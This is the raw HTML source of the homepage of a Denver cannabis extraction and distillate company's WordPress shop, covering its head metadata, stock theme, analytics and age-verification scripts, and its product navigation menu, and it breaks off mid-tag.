<!DOCTYPE html> <html lang="en-US" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking_disabled html_header_transparency html_header_glassy html_mobile_menu_phone html_header_searchicon html_content_align_center html_header_unstick_top_disabled html_header_stretch_disabled html_av-overlay-side html_av-overlay-side-classic html_av-submenu-noclone html_entry_id_25 av-no-preview html_text_menu_active "> <head> <meta charset="UTF-8" /> <meta name="robots" content="index, follow" /> <!-- mobile setting --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Scripts/CSS and wp_head hook --> <title>Concentrate Supply Co.™ - Cannabis Refinement based in Denver, CO</title> <!-- All in One SEO Pack 2.12.1 by Michael Torbert of Semper Fi Web Design[779,851] --> <meta name="description" content="Extractions, Distillations &amp; Water-Soluble Infusions. Recreational &amp; Medical cannabis refinement based in Denver, CO." /> <meta name="keywords" content="shatter colorado, csc colorado, live resin colorado, cannabis refinement, cannabis processing, thca, wax, 510 vape battery, vape cart, distillate vape, buy vape battery" /> <link rel="canonical" href="https://concentratesupplyco.com/" /> <script type="text/javascript" > window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-108063304-1', { 'cookieDomain': 'concentratesupplyco.com' } ); // Plugins ga('send', 'pageview'); </script> <script async src="https://www.google-analytics.com/analytics.js"></script> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Concentrate Supply Co.™ - Cannabis Refinement in Denver, CO &raquo; Feed" href="https://concentratesupplyco.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Concentrate Supply Co.™ - Cannabis Refinement in Denver, CO &raquo; Comments Feed" href="https://concentratesupplyco.com/comments/feed/" /> <!-- google webfont font replacement --> <script type='text/javascript'> if(!document.cookie.match(/aviaPrivacyGoogleWebfontsDisabled/)){ (function() { var f = document.createElement('link'); f.type = 'text/css'; f.rel = 'stylesheet'; f.href = '//fonts.googleapis.com/css?family=Mako%7CRoboto:100,400,700%7CQuicksand'; f.id = 'avia-google-webfont'; document.getElementsByTagName('head')[0].appendChild(f); })(); } </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/concentratesupplyco.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='avia-woocommerce-css-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-woocommerce/woocommerce-mod.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-grid-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/grid.css?ver=4.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='avia-base-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/base.css?ver=4.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='avia-layout-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/layout.css?ver=4.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-audioplayer-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-blog-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blog.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-postslider-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslider/postslider.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-button-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-buttonrow-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonrow/buttonrow.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-button-fullwidth-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-catalogue-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-comments-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-contact-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-contentpartner-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-countdown-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gallery-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gallery-hor-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-maps-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_maps/google_maps.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gridrow-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_row/grid_row.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-heading-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-rotator-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-hr-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-icon-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/icon.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-iconbox-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-icongrid-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-iconlist-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-image-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/image.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-hotspot-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-magazine-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-masonry-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-siteloader-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-menu-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-modfule-notification-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-numbers-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-portfolio-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-progress-bar-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-promobox-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-sc-search-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/search.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-accordion-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-feature-image-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-fullsize-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullsize/slideshow_fullsize.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-fullscreen-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-ls-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-social-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_share/social_share.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-tabsection-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-table-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-tabs-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-team-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/team.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-testimonials-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-timeline-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-toggles-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-video-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://concentratesupplyco.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wc-block-style-css' href='https://concentratesupplyco.com/wp-content/plugins/woo-gutenberg-products-block/build/style.css?ver=2.1.0' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='avia-scs-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/shortcodes.css?ver=4.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='avia-popup-css-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5.7' type='text/css' media='screen' /> <link rel='stylesheet' id='avia-lightbox-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5.7' type='text/css' media='screen' /> <link rel='stylesheet' id='avia-widget-css-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5.7' type='text/css' media='screen' /> <link rel='stylesheet' id='mediaelement-css' href='https://concentratesupplyco.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://concentratesupplyco.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-dynamic-css' href='https://concentratesupplyco.com/wp-content/uploads/dynamic_avia/enfold.css?ver=5cd98e44c51fd' type='text/css' media='all' /> <link rel='stylesheet' id='avia-custom-css' href='https://concentratesupplyco.com/wp-content/themes/enfold/css/custom.css?ver=4.5.7' type='text/css' media='all' /> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia-compat.js?ver=4.5.7'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <link rel='https://api.w.org/' href='https://concentratesupplyco.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://concentratesupplyco.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://concentratesupplyco.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <meta name="generator" content="WooCommerce 3.6.2" /> <link rel='shortlink' href='https://concentratesupplyco.com/' /> <link rel="alternate" type="application/json+oembed" href="https://concentratesupplyco.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconcentratesupplyco.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://concentratesupplyco.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconcentratesupplyco.com%2F&#038;format=xml" /> <script type="text/javascript" src="https://custom.ageverify.co/avwp.js"></script><script data-wppath="https://concentratesupplyco.com/wp-content/plugins" type="text/javascript" src="https://concentratesupplyco.com/wp-content/plugins/ageverify-custom/includes/av_blackBG.js" id="AgeVerifyScript" data-underageredirect="https://ageverify.co/" data-cookielength="1"></script><link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="alternate" type="application/rss+xml" title="Concentrate Supply Co.™ - Cannabis Refinement in Denver, CO RSS2 Feed" href="https://concentratesupplyco.com/feed/" /> <link rel="pingback" href="https://concentratesupplyco.com/xmlrpc.php" /> <style type='text/css' media='screen'> #top #header_main > .container, #top #header_main > .container .main_menu .av-main-nav > li > a, #top #header_main #menu-item-shop .cart_dropdown_link{ height:80px; line-height: 80px; } .html_top_nav_header .av-logo-container{ height:80px; } .html_header_top.html_header_sticky #top #wrap_all #main{ padding-top:80px; } </style> <!--[if lt IE 9]><script src="https://concentratesupplyco.com/wp-content/themes/enfold/js/html5shiv.js"></script><![endif]--> <link rel="icon" href="https://concentratesupplyco.com/wp-content/uploads/2017/10/CSC-WhiteBackground-01-300x300.png" type="image/png"> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <style type='text/css'> @font-face {font-family: 'entypo-fontello'; font-weight: normal; font-style: normal; font-display: auto; src: url('https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.eot'); src: url('https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.eot?#iefix') format('embedded-opentype'), url('https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.woff') format('woff'), url('https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.ttf') format('truetype'), url('https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.svg#entypo-fontello') format('svg'); } #top .avia-font-entypo-fontello, body .avia-font-entypo-fontello, html body [data-av_iconfont='entypo-fontello']:before{ font-family: 'entypo-fontello'; } </style> <!-- Debugging Info for Theme support: Theme: Enfold Version: 4.5.7 Installed: enfold AviaFramework Version: 5.0 AviaBuilder Version: 0.9.5 aviaElementManager Version: 1.0.1 ML:268435456-PU:19-PLA:10 WP:5.2 Compress: CSS:disabled - JS:disabled Updates: disabled PLAu:9 --> </head> <body id="top" class="home page-template-default page page-id-25 rtl_columns stretched mako helvetica-neue-websave helvetica_neue no_sidebar_border woocommerce-no-js" itemscope="itemscope" itemtype="https://schema.org/WebPage" > <div id='wrap_all'> <header id='header' class='all_colors header_color light_bg_color av_header_top av_logo_left av_main_nav_header av_menu_right av_custom av_header_sticky av_header_shrinking_disabled av_header_stretch_disabled av_mobile_menu_phone av_header_transparency av_header_glassy av_header_searchicon av_header_unstick_top_disabled av_bottom_nav_disabled av_alternate_logo_active av_header_border_disabled' role="banner" itemscope="itemscope" itemtype="https://schema.org/WPHeader" > <div id='header_main' class='container_wrap container_wrap_logo'> <ul class = 'menu-item cart_dropdown ' data-success='was added to the cart'><li class='cart_dropdown_first'><a class='cart_dropdown_link' href='https://concentratesupplyco.com/cart/'><span aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'></span><span class='av-cart-counter'>0</span><span class='avia_hidden_link_text'>Shopping Cart</span></a><!--<span class='cart_subtotal'><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>0.00</span></span>--><div class='dropdown_widget dropdown_widget_cart'><div class='avia-arrow'></div><div class="widget_shopping_cart_content"></div></div></li></ul><div class='container av-logo-container'><div class='inner-container'><span class='logo'><a href='https://concentratesupplyco.com/'><img height='100' width='300' src='https://concentratesupplyco.com/wp-content/uploads/2017/09/csc-longv2black-wordpress-1030x285.png' alt='Concentrate Supply Co.™ - Cannabis Refinement in Denver, CO' /><span class='subtext'><img src='https://concentratesupplyco.com/wp-content/uploads/2017/09/csc-longv2-wordpress-white.png' class='alternate' alt='' title='' /></span></a></span><nav class='main_menu' data-selectname='Select a page' role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" ><div class="avia-menu av-main-nav-wrap"><ul id="avia-menu" class="menu av-main-nav"><li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-25 current_page_item menu-item-top-level menu-item-top-level-1"><a href="https://concentratesupplyco.com/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Home</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a></li> <li id="menu-item-211" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-top-level menu-item-top-level-2"><a href="#" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Products</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a> <ul class="sub-menu"> <li id="menu-item-203" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://concentratesupplyco.com/products/hydrocarbonextractions/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Hydrocarbon Extractions</span></a></li> <li id="menu-item-204" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://concentratesupplyco.com/products/solventless/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Solventless Extractions</span></a></li> <li id="menu-item-202" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://concentratesupplyco.com/products/distillateproducts/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Distillate Products</span></a></li> <li id="menu-item-788" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="http://www.dosdedibles.com" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Edibles by DŌSD</span></a></li> </ul> </li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-top-level menu-item-top-level-3"><a href="https://concentratesupplyco.com/the-latest/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">The Latest</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a></li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-top-level menu-item-top-level-4"><a href="https://concentratesupplyco.com/contact/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Contact Us</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a></li> <li id="menu-item-1001" class="menu-item menu-item-type-post_type menu-item-object-page av-menu-button av-menu-button-bordered menu-item-top-level menu-item-top-level-5"><a href="https://concentratesupplyco.com/shop/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Shop</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a></li> <li id="menu-item-search" class="noMobile menu-item menu-item-search-dropdown menu-item-avia-special"> <a href="?s=" rel="nofollow" data-avia-search-tooltip=" &lt;form action=&quot;https://concentratesupplyco.com/&quot; id=&quot;searchform&quot; method=&quot;get&quot; class=&quot;&quot;&gt; &lt;div&gt; &lt;input type=&quot;submit&quot; value=&quot;&quot; id=&quot;searchsubmit&quot; class=&quot;button avia-font-entypo-fontello&quot; /&gt; &lt;input type=&quot;text&quot; id=&quot;s&quot; name=&quot;s&quot; value=&quot;&quot; placeholder='Search' /&gt; &lt;/div&gt; &lt;/form&gt;" aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'><span class="avia_hidden_link_text">Search</span></a> </li><li class="av-burger-menu-main menu-item-avia-special "> <a href="#"> <span class="av-hamburger av-hamburger--spin av-js-hamburger"> <span class="av-hamburger-box"> <span class="av-hamburger-inner"></span> <strong>Menu</strong> </span> </span> </a> </li></ul></div></nav></div> </div> <!-- end container_wrap--> </div> <div class='header_bg'></div> <!-- end header --> </header> <div id='main' class='all_colors' data-scroll-offset='80'> <div id='av_section_1' class='avia-section main_color avia-section-default avia-no-shadow avia-bg-style-scroll avia-builder-el-0 el_before_av_section avia-builder-el-first av-medium-hide av-small-hide av-mini-hide av-minimum-height av-minimum-height-100 av-section-with-video-bg container_wrap fullsize' style=' ' data-av_minimum_height_pc='100' data-section-video-ratio='16:9'><div data-size='featured' data-lightbox_size='large' 